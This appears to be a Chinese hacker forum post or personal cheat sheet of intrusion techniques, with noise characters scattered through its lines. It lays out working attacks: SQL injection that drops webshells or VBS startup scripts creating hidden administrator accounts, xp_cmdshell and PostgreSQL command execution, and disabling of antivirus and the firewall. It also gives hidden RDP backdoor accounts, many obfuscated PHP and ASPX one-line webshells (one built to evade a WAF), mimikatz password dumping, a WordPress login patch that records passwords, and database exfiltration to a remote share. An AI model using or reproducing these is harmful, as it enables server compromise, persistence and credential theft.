, |' A, r; P' @: _% z& L* ~create table a (cmd text);
3 [3 p' Z# ^7 Pinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
& N: c, H/ h9 Q6 G+ V! F6 j7 ~insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );5 W9 }3 M3 u) `2 V
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );8 ]; K5 v+ n& B# |; t+ F" R
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";6 j& ?/ L9 T2 f
drop table a;4 s5 V( D$ g4 `8 J( T
/ j! h2 H; }2 o1 z7 @英文版本:
- l) W0 U+ g: k' l) f9 G" C4 K4 H( g. [. @
use test;) C7 }5 u4 v/ Z6 n1 n: T2 S
create table a (cmd text);
9 u+ x0 ]0 N) l3 U3 finsert into a values ("set wshshell=createobject (""wscript.shell"") " );
4 V3 q& q+ Q' n/ X8 Binsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
$ z- w; {( G3 [- uinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
- |+ Q) j1 } e5 J' R5 G* h @; z4 ?select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";/ B# G# @9 f% T9 d2 S- n
drop table a;
a9 y7 |0 u# e/ o
# r4 I7 s0 @* f/ g% b6 screate table a (cmd BLOB);
+ d9 l. g2 [; d; [: }( jinsert into a values (CONVERT(木马的16进制代码,CHAR));% \) S( L: @0 |# n$ Y9 v
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'8 x( }1 b7 a" S: ]1 U
drop table a;7 @& o* Q7 B5 ?4 N5 @- e
4 Z* r/ \, ]% q- [0 S
记录一下怎么处理变态诺顿% n& f+ U$ H" f( ^9 |
查看诺顿服务的路径+ o( r! Y# E. W$ `/ k7 z
sc qc ccSetMgr4 W* w- w: x% J w/ Q# I
然后设置权限拒绝访问。做绝一点。。
* {& U/ l# m$ r4 j: scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system8 L9 U+ w9 I8 A# A# o4 O
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER". M) f- r. F: B
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
" |# r; R0 Q: Wcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
$ }& u( ?' h; T' {( v* z/ g" z6 x7 H9 Z- D# g2 w' W. B! f: n
然后再重启服务器
. i P/ C+ a, n t* _/ T1 Wiisreset /reboot+ n9 W: _$ q1 ~: T
这样就搞定了。。不过完事后。记得恢复权限。。。。
$ d9 n8 ~! I) y4 ] u6 p7 }cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F+ B0 b! e3 p% }
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
3 l' R, R' Z% E5 Y# \5 }cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F! _* w P- A0 u: d2 G& x% M; r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
% ?. U2 N P$ @# }9 ^1 K) BSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
* r4 T6 A2 X$ q1 h) X' b3 C# L6 B' K. O3 y$ i
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
9 g% j0 Q* H, [# [
, A$ T; Q7 d+ l" P. ~# w% f. Z; V7 a* ^7 xpostgresql注射的一些东西
- i# Z& f5 q/ ]8 v1 I4 g6 d3 a如何获得webshell
' i5 P' b- ]0 h$ Q8 Mhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ! D- ?( U+ C, u" Q4 D3 c
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); $ ]+ l$ H/ D/ W( Y
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
; e& }! i5 I! I如何读文件: _8 H( m: G% G& x
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
$ V* K k; }6 V9 Qhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
3 ?0 Y% Z. l& Chttp://127.0.0.1/postgresql.php?id=1;select * from myfile;: l* Q! T& t" P: I. v
+ }( A+ ^( o" Nz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。' Q& i* M/ b3 ]& X4 w G
当然,这些的postgresql的数据库版本必须大于8.X
9 y4 o) @. c$ {0 s2 Y) d4 t创建一个system的函数:8 h+ Y: ]8 d4 l5 o/ ?0 o
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
) Q" L- Q" V U/ A5 {$ }
3 o8 a! f' u" R4 N0 Z& o$ U创建一个输出表:
3 A5 h9 x# G. C3 X& r/ o/ p+ j; UCREATE TABLE stdout(id serial, system_out text)1 w" I9 m& d( r7 P5 s& k& E! v
0 ?1 Q. m2 {& s, V9 w执行shell,输出到输出表内:
. f& Z; F1 l* E6 M6 ^& o! k# P4 c, JSELECT system('uname -a > /tmp/test')
1 [) ]$ K0 D6 j* g8 O% {3 ~; E! A) _
copy 输出的内容到表里面;8 |) q' Z" l$ L5 }3 b
COPY stdout(system_out) FROM '/tmp/test'
0 Y; N* Q: u( A, u' k9 W+ l( y( a7 d+ m
从输出表内读取执行后的回显,判断是否执行成功- p& ?1 C! q4 V4 V( R" h/ G0 z+ A) n
% O; [3 ~5 Q6 F% B
SELECT system_out FROM stdout* [% a/ S' E4 y+ B2 Z' C/ r# X$ }
下面是测试例子
$ I8 U1 _ `9 u; K: Z( m% O$ P6 n# k' ]! {* P: S1 R; F
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
7 K0 N2 m- d8 M8 C% ~
- \+ O4 J! L2 ?) M$ e7 k/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
/ }6 Q( Y1 H3 }2 v) r# lSTRICT --0 Z- @1 \+ Q$ c( r
0 m$ v$ _ N2 z/store.php?id=1; SELECT system('uname -a > /tmp/test') --
6 i" j2 y3 Y& a! m2 D# ~; ?
. X, g- F( C$ m! c2 ~/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
0 |( G* I i" G* S0 a8 M( [$ M5 ~' R3 [- P6 o+ F y
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--6 z8 ?. G9 A/ }; d6 D3 V/ a2 L
net stop sharedaccess stop the default firewall
- p6 N6 m* ~- ^6 F9 rnetsh firewall show show/config default firewall
. Z1 X* [' C8 V; u) X& a2 Wnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
. ?3 C* n, ]( U4 t) enetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall. j2 ~# [: K! L4 B; l
修改3389端口方法(修改后不易被扫出)
' B* a9 E& V) I! e! g9 W修改服务器端的端口设置,注册表有2个地方需要修改5 e2 }2 N- _" u; G/ {# x
+ p8 @& N' [4 Y5 c8 I+ {; J9 a9 }
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
* F8 A" W a6 m0 `+ B" D) I5 bPortNumber值,默认是3389,修改成所希望的端口,比如6000
. |2 ^# ^$ I9 V% g
G& Q5 h% b$ b( Z4 z9 ?第二个地方:& G5 N( s' H+ \& n/ u
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ! E1 n& g! y1 X: |1 O) n0 t
PortNumber值,默认是3389,修改成所希望的端口,比如6000
8 \8 d, B/ b O- g9 \" C0 R& n/ j$ B9 h, T- w
现在这样就可以了。重启系统就可以了& f. | M( p$ L' {* G
' M- G8 i& r8 L6 `查看3389远程登录的脚本
) G2 t$ I% b" ^! }7 x5 ?保存为一个bat文件
2 e: Y7 S1 a+ J3 F+ Xdate /t >>D:\sec\TSlog\ts.log! H) W/ | L9 [7 e; P9 F! o ^
time /t >>D:\sec\TSlog\ts.log- ^4 ?6 K' b) x) S2 d; p
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
8 v6 H- t7 e/ Wstart Explorer
6 t" R' y! j+ v. ]6 N$ v
5 a' g$ {& g' j* m( }) imstsc的参数:' [& K& \4 ]+ m7 R; Q5 v
9 n0 L5 h# T3 Q, D- v7 _远程桌面连接3 s& V- Q1 i4 u' k
9 `1 n0 ~2 j# _8 {5 ?# IMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]1 ?! z; |; q8 x; x& {
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
/ ~& |; I; l- J* w5 B. z2 E- k) }! ~/ Q. R' @+ ]% w) G
<Connection File> -- 指定连接的 .rdp 文件的名称。7 l5 n0 h- l S+ V; t( k. d* B
. F7 e& C" S2 G. K$ ~8 u
/v:<server[:port]> -- 指定要连接到的终端服务器。
: }2 c# ^% ?1 s- z8 j' d: T$ o& B9 L1 h+ \: p2 w
/console -- 连接到服务器的控制台会话。
9 m2 N* s7 |% D* n U4 H
, u! b5 K; {- H1 y& f" K/f -- 以全屏模式启动客户端。
4 C+ Y3 A1 e1 `9 ?* O! h+ Q3 y. Z1 \4 ]+ g: q, d) H! \
/w:<width> -- 指定远程桌面屏幕的宽度。: w% Q, U, M$ q. ]% o2 }
/ i$ U0 ~8 X \/h:<height> -- 指定远程桌面屏幕的高度。" U6 ]! O3 k5 b. w: I
9 Q/ a6 u. q8 f7 j! J
/edit -- 打开指定的 .rdp 文件来编辑。
1 m' G% R& R9 O. O! G
$ ?. w& g Q. ] Q/migrate -- 将客户端连接管理器创建的旧版
3 h6 y* v+ G5 B2 T% T. f连接文件迁移到新的 .rdp 连接文件。
2 B! d2 B ~. |
8 q, n" a* c4 Q: N
! n |5 }* M& J3 s* t其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
( D5 U5 T* x6 O* E5 o$ [2 Emstsc /console /v:124.42.126.xxx 突破终端访问限制数量
; G: f x% E9 U, I) A! J, y9 X% E1 m \0 G, B% |
命令行下开启3389" g C3 ?: d# V4 L. G6 [& Q
net user asp.net aspnet /add! c, y2 o7 y' i9 s% B: @% v
net localgroup Administrators asp.net /add
7 u- f8 Q; O: [# b+ w. {. R" Znet localgroup "Remote Desktop Users" asp.net /add
6 H0 t4 \" g8 O1 Q w+ zattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D' B% d0 K7 E& F; R0 L" V
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0) B) d: `6 e, ^3 Y: f: S
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1; C- Q# R l% y7 h$ j; s
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f6 y, R! H- i# ~/ ^
sc config rasman start= auto& R' g, Z% @/ P
sc config remoteaccess start= auto
. ]8 q7 R( b. f1 q6 F' Z0 _1 Pnet start rasman
* Y# a. q8 I) A* L- {net start remoteaccess! D2 R7 @' n* ^5 S& G- D+ k5 m k
Media
( C/ j, `, ~$ O( j/ ?/ q$ B2 S<form id="frmUpload" enctype="multipart/form-data"
Y5 Y$ w% d7 }7 O: L$ c# [. x# Zaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
3 r0 P5 J) R' ~% s/ Z z<input type="file" name="NewFile" size="50"><br>
. h: |6 f% v+ L/ D. h) ~# B$ o<input id="btnUpload" type="submit" value="Upload">
+ k. b# z, ~( w- a. T! E j- [</form>
6 Y/ \* X K7 g1 i8 Q5 K7 a- h5 K$ i; J j( O
control userpasswords2 查看用户的密码9 u+ V) L; R" a4 Q0 b2 W) R3 W4 _
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
6 L' U2 s4 e& `0 q8 N' ~5 pSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
, U: Z6 k+ y6 K! J* B2 l) |4 W! L/ ]' _" H5 Y7 C
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
% L8 g; K! C9 e. H) Q! n {4 M测试1:
1 H' Z! w+ T6 g( QSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1, I! S: i6 I0 w8 M( J; p( G
, L: b! U0 C$ X5 p" [$ ?
测试2:- r% R* b* v: V# m* `
% Y/ E# b0 D3 O, Z8 N4 Z) ~2 m0 N
create table dirs(paths varchar(100),paths1 varchar(100), id int)
& f. r7 V1 L$ I3 J: ]$ n1 g
6 y) |# J! w/ `2 x2 i2 X, C; Idelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
" k u3 C) p- y) e; {2 S9 ?6 O' O5 N& R L6 @- T2 m% K2 N
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
' Y. F* ]) u+ j2 \5 Y关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令# s! N( K( Y" H9 u& S. m' |$ t
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
9 g7 C7 C0 f- S$ znet stop mcafeeframework) U* q7 {2 U2 m* Y4 y
net stop mcshield
. \( e. l, }% O6 V: s- x. Q) a. {* fnet stop mcafeeengineservice
! y" N) R( j8 K" A4 q j: Wnet stop mctaskmanager
9 V" t' S. [( s# I/ m0 d( Vhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D9 _3 ]- D' R" \/ I Y* Q
, {# C0 N3 a" _1 v VNCDump.zip (4.76 KB, 下载次数: 1)
- r) N; {5 c; j$ T6 Y$ e密码在线破解http://tools88.com/safe/vnc.php
% e" I/ U( Q" I2 D. O: G. GVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取+ r: Y3 U0 |, O |# A
0 y$ p0 z3 r! G: w
exec master..xp_cmdshell 'net user'* A6 o/ p' y8 `- X$ d) {
mssql执行命令。" O% O+ n9 W6 _/ R% \* ?; x
获取mssql的密码hash查询
, {: K( r2 m! @! H8 Y1 nselect name,password from master.dbo.sysxlogins9 M% ]) Y) X" Y/ x/ z
8 y+ @! o* A7 l! e5 F Y8 ^0 U m0 zbackup log dbName with NO_LOG;& L" S* x; V0 R7 f( G8 y$ _/ X
backup log dbName with TRUNCATE_ONLY;8 I! k3 q# Y, B' N
DBCC SHRINKDATABASE(dbName);
1 [! g; @# @/ ~- h/ A B. emssql数据库压缩
" @6 A# m- Z% r! D S
% ?( I+ o- B9 w, Y+ `; Z8 wRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
, e6 N7 Q0 p9 U7 k3 f将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
" h6 p z7 y" z: q
; n. m- X9 h3 p7 Obackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'/ N e, g' `2 w( V a7 f
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak/ f! G# l$ \' c D& Q
) [! e/ l& @7 h& i$ ~* }
Discuz!nt35渗透要点:
) t' i* M& B0 ?3 b: g, \(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
# J) C) u; I, G1 V9 h(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>7 i* m$ d T: E/ R6 g/ a) p
(3)保存。
; l. @# ~8 c5 t8 a4 P2 _3 {' C% o(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
6 t# H$ E) ~: V% `4 l/ Jd:\rar.exe a -r d:\1.rar d:\website\7 @5 l# o* a! n
递归压缩website* K/ T d( k5 y) u5 f* \
注意rar.exe的路径( m) _3 d% h v, f
# r0 [7 c& N5 \* w$ O5 i5 c7 S( U
<?php; r1 q- k2 b6 n+ d0 W, c
, R: w7 c: c- |
$telok = "0${@eval($_POST[xxoo])}";
! R& I6 @ [' c4 f O) z4 n8 z( @. o! o. ^: @7 _$ S4 d6 s2 n
$username = "123456";
2 s/ C- a8 e( R/ Y% ^5 o8 M; U6 O! F `7 K- m! v1 b
$userpwd = "123456";
+ o! ^. g4 f0 b, M/ R, ~) Q6 O1 A# ^6 w( v, a1 K
$telhao = "123456";
, D# t4 b- l* a* a
0 U+ G) w- ~9 V$ |) w$telinfo = "123456";
9 }8 r6 ^$ D6 L, e
0 i6 E3 ]) j# ?3 h3 E) b?>
2 ^ S5 }7 i# v# ?3 Rphp一句话未过滤插入一句话木马
# x% F$ O. ^8 K! C4 d. T. x- R
- T* B/ ` Q8 B( \3 @; q站库分离脱裤技巧4 D+ s. W% \; z7 {4 ?( H
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'3 k. ?, o2 C; Y1 }* B2 j+ C: g
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
) g- _. e5 @" `条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
3 D1 c7 K2 ]8 Q) F7 D; D$ q$ M这儿利用的是马儿的专家模式(自己写代码)。
, |# I" {. t. M9 e& t0 x ^4 }ini_set('display_errors', 1);
! e: t1 \& H$ q# aset_time_limit(0);
" P: g& ^5 s4 Oerror_reporting(E_ALL);# b; y0 X7 f0 p
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());9 l# D- S8 p0 f2 N6 a( {. F" F, o
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
) |: G: B, N( m$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
# Q; `3 M6 [: }" V; }# E$i = 0;
; [" G$ v. c N8 v6 b* _3 h$tmp = '';) x3 ?% t/ W9 V1 E
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {2 e+ y Q& ^( S/ p/ O3 g
$i = $i+1;
8 L& P6 z% t6 F. b2 Z( L, f9 G! P $tmp .= implode("::", $row)."\n";
- N! D! N3 o: X5 P4 a) F if(!($i%500)){//500条写入一个文件
, f7 E# x# E9 I; H' |0 |# U. [: _5 j $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';/ m' O( K. j$ T6 t5 T. {
file_put_contents($filename,$tmp);% A/ v1 Z% a4 c/ {
$tmp = '';' C8 h' g }9 U r4 t0 J% z: L3 G
}- x! t }& d; y* O4 t. }1 j
}
* s: o4 Q$ \0 `% G+ x3 [1 Qmysql_free_result($result);
2 w& C2 j X. ~& o9 W- a6 F: t0 R' I# m; g7 r0 R L7 R
! l7 e* b( h9 s0 b0 |( P
' L0 ^0 y( y, W3 G# k//down完后delete
) V5 M; N2 c, t0 N' F6 |& d+ ? D
! L. \) E9 f$ s: o) D5 k; i% r6 ~! l" p1 _) |, M" L; b
ini_set('display_errors', 1);: X: R4 S2 H4 S) }) J
error_reporting(E_ALL);
( O" A5 r m8 W C1 D9 ], Q$i = 0;5 ?' K" T) F2 F0 C8 \5 G; r1 a' C
while($i<32) {
$ [! n7 g; \ i* D' r5 L/ D/ B $i = $i+1;( {9 e6 X8 s/ B0 t, s6 r
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
9 A; a2 }( b' E9 ~ unlink($filename);
) z* G: B+ I) ^) \} ' X6 a. W5 ?2 U4 F M9 `
httprint 收集操作系统指纹
) x4 O1 a5 c; ?7 ~: b& E' `! {1 _扫描192.168.1.100的所有端口
; r. c; n; x& q3 |; v) Q* Anmap –PN –sT –sV –p0-65535 192.168.1.100
- C4 J: D: Z" D' P/ b0 h A& Mhost -t ns www.owasp.org 识别的名称服务器,获取dns信息* Z) L5 Q g9 |) B% ]
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
- Z" x9 U* l4 I; lNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
2 F1 `% u. V0 |. \6 L! J3 c# c
) E" S9 }* m7 W: p4 T- Y! A& RDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
" X/ d3 q3 A- Y. Q6 E" P5 X( Y5 P2 }
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)( ?6 v( S( `( N2 I8 u
" N( a% z1 ?! G+ h% {% h8 u0 m
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x8 K! @( x% @* K6 L1 Z( q+ \/ i7 D
0 [' H2 x# I' L# _+ J" T" _ DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)4 r% }. d$ \+ _6 l' E9 i! ~
H K) W- _! Q1 Y' M) j' P! l/ L0 l- C
http://net-square.com/msnpawn/index.shtml (要求安装)2 }0 U0 C2 d* R+ ~
' \4 _- z) D! a; i- G tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的), a/ v3 @0 E; G( \% T
8 ` t* t/ G% W8 R5 h0 V* T SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
9 i7 @2 Z+ l8 O/ P7 d* ^; J" \& D2 Lset names gb2312
# D. a! J7 z0 w6 K导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。, X. ~1 H. P8 F) {) j" u$ u' d
3 e, b4 a: H; `$ N" c$ ~; Imysql 密码修改
* }6 B1 L- i+ SUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ! G" u% [+ Z9 O/ d5 ]0 ^
update user set password=PASSWORD('antian365.com') where user='root';
~! e% ]/ ~/ k/ N$ u s4 [flush privileges;4 O: k% t- P0 I- Y+ R# D
高级的PHP一句话木马后门
+ {; O; p6 `5 o$ p8 W/ A/ t6 d& i! s
' q7 O7 w6 u% f1 R" Q8 H: d入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
L, S* k; Y6 ^: q: a* T0 q. {% T3 k3 ^; B, v
1、5 ]! Y; I& W4 t. ]' R2 O
4 r4 f& ?7 B2 P7 O" b$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
& I* B; S5 Q1 P4 f9 Y; Z' `
, w1 {" K. q! |8 z$hh("/[discuz]/e",$_POST['h'],"Access");6 {4 y& _( p" @" P$ L
# d7 K: G9 H/ D9 x3 R5 J
//菜刀一句话
}; B. ~8 x" Z% t" W* w: `+ b6 o7 l& W X7 t, n( q* R. P
2、8 f& n" G, [6 I: }
. c Y. @8 W$ i) `$ n
$filename=$_GET['xbid'];% {' d- P0 f- b3 h4 v5 C5 q/ J
; Q: u. Q8 h% V! \' d1 k' z
include ($filename);
9 L- ^$ m. x) L3 W
! p2 F; {/ Y6 J( Q7 s//危险的include函数,直接编译任何文件为php格式运行
}1 O6 ]. F+ E6 `: r$ F$ V- ^8 [" y! J6 M
3、
0 O- z0 V1 ]% N" ?: v D( s; e& y @& P3 T
$reg="c"."o"."p"."y";
8 r2 q# j+ [. z' j3 n/ |7 p/ O% `; ?
4 @9 E2 {+ N2 E2 D; G8 ]2 n$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);) p x( w3 \ n* ~
# O% G2 i$ T- g% o' ~ @3 `0 ]//重命名任何文件; {! [9 x, S8 G/ l
3 c) @ y V: c8 W6 h3 w
4、4 K% v8 o: p5 o$ k
) s _& Q( U- r3 a D- k$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
9 e1 Z. O+ s& p1 Z, C4 [3 V! A1 |4 R, h t$ k/ f1 P/ K8 R! u4 q$ Z
$gzid("/[discuz]/e",$_POST['h'],"Access");) ]+ r) ~3 s" o% M. G
: l6 G& W. K/ e6 F
//菜刀一句话
( n; R& d+ @9 _2 B0 o. ^ u3 y# M
5、include ($uid);6 t8 Z& V L( L1 |7 G8 a
# L/ F+ q0 l( I1 `0 e
//危险的include函数,直接编译任何文件为php格式运行,POST 2 Y8 x4 U- l* A3 Y2 D. R
) G( T$ K* Z4 y# M% F4 @; c
/ k: \/ H# R* F I; G7 j9 m: S//gif插一句话
* f# B2 ^) A5 w+ T; t9 C: Z/ o% l* q' e8 ?
6、典型一句话/ C# ^1 U" @' I8 o( q; x8 Y- o
/ z3 h4 B! D- p- q+ I9 H程序后门代码
7 g1 N. g" B0 X) ~' W' `<?php eval_r($_POST[sb])?>+ j( q' E" o% F
程序代码
! }$ a$ y- I8 q |" g' _8 q<?php @eval_r($_POST[sb])?>- ^1 \& A& i- _; O
//容错代码
6 ` O3 a, Q, {3 Z# i+ X0 W4 V0 ?/ b程序代码
: B! | K6 h1 D& f6 |! T: B# y* P$ v<?php assert($_POST[sb]);?>" m/ @- G8 C" H5 ?, }
//使用lanker一句话客户端的专家模式执行相关的php语句
: v6 v; [6 E, q4 v6 h7 B2 v程序代码
1 d/ _% f9 `5 f+ u. Y- C<?$_POST['sa']($_POST['sb']);?>2 t- i3 N; k9 \
程序代码5 ?+ W7 u; U* i/ m
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
" k/ S- `* W( W% G程序代码2 H) x9 S# f" R" O/ ^' T' h, v
<?php8 k9 E' J! y- x
@preg_replace("/[email]/e",$_POST['h'],"error");
8 y$ v( F" ]5 o( c3 C4 }& E7 [?>
# o1 V7 ?, u. ?/ Z1 [( H$ \9 b4 }//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
. q+ H* ?. L6 x2 F; s) J' ] J程序代码; f) Y; f% M {+ r4 o7 f
<O>h=@eval_r($_POST[c]);</O>
, { m8 T A9 z程序代码
8 d+ u! q4 \! I$ n2 _% @: Z<script language="php">@eval_r($_POST[sb])</script>
6 L: }1 q1 q4 E//绕过<?限制的一句话) K# L4 [" h: ?
4 D, c" g* C( b/ }: h' N6 yhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip- H8 R- F8 v" y) z3 C: U" N
详细用法:
& y9 t& E e9 J1、到tools目录。psexec \\127.0.0.1 cmd; ~0 T* u. r7 u' K2 J' s, }5 h
2、执行mimikatz
8 r# {, S7 e: r3、执行 privilege::debug
6 v7 w! w1 n+ a: ?7 X- [4、执行 inject::process lsass.exe sekurlsa.dll7 N9 x3 Q. b0 I, b O0 c
5、执行@getLogonPasswords
X+ Q# H$ ]" n1 ]& c6、widget就是密码1 [- g1 a0 d u: Y5 @2 S7 X% s
7、exit退出,不要直接关闭否则系统会崩溃。# M2 ^, f4 w* F0 b+ A( A
4 k9 j! h: L9 }# ^# X& y5 O xhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
' \4 ^3 a9 b+ o; A" k
* v- ^5 C0 {: o, T) {. j+ o: L自动查找系统高危补丁2 }- [* ^$ K. f' \4 F% z
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt. K9 C" D7 i4 n5 c
0 T: X) H% @3 i+ p6 }" Y" ]突破安全狗的一句话aspx后门
( Y# y5 G8 Z7 U4 e! y. t1 ^+ o; F<%@ Page Language="C#" ValidateRequest="false" %>
" F, q8 f4 m# n. X, R& b2 d+ V<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>( M, {" q( B# x- b$ Z' Z2 ^1 r' n
webshell下记录WordPress登陆密码
& @; N8 E, s L L! gwebshell下记录Wordpress登陆密码方便进一步社工 L7 E! e8 `5 T3 Y9 h5 C
在文件wp-login.php中539行处添加:
6 X+ n8 V( `1 F- Z% k4 C* \// log password. F+ F: S- i, t5 D
$log_user=$_POST['log'];
! e' f C) D' f" j. w$log_pwd=$_POST['pwd'];
8 t6 b5 `- ]# d4 I3 k6 U$log_ip=$_SERVER["REMOTE_ADDR"];
( Z, Z3 F& Q% Z$ t* R+ i4 E$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;- A8 D+ t4 C; h& Z/ M6 Y
$txt=$txt.”\r\n”;" Y6 k( H+ d- z k' U3 f' }! h0 w
if($log_user&&$log_pwd&&$log_ip){
: Z" f( x4 Z+ G( G/ g' r. J@fwrite(fopen(‘pwd.txt’,”a+”),$txt);% ~+ n T3 ^* o
}& y3 Z) s7 F& C+ l# `
